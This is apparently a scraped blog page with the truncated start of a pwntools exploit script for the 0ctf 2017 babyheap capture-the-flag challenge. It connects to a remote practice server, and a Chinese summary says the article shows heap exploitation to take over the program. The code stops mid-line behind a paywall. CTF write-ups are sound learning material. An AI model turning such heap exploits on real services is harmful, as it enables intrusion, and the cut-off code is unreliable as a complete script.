from pwn import *
from LibcSearcher import *
context(log_level='debug',arch='amd64', os='linux')
pwnfile = "./0ctf_2017_babyheap"
io = remote("node4.buuoj.cn",28243)
#io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc-2.23_64.so")
def add(size):
io.recvuntil(b"Command: ")
io.sendline(b"1")
io.recvuntil(b"Size: ")
io.sendline(str(size))
def edit(idx,size,data):
io.recvuntil(b"Command: ")
io.sendline(
0ctf_2017_babyheap
最新推荐文章于 2025-12-03 17:07:06 发布
本文通过实例演示了如何利用BabyHeap程序中的漏洞进行攻击。详细介绍了利用步骤,包括内存分配、释放、修改等技巧,最终实现对程序的控制。

最低0.47元/天 解锁文章
738

被折叠的 条评论
为什么被折叠?



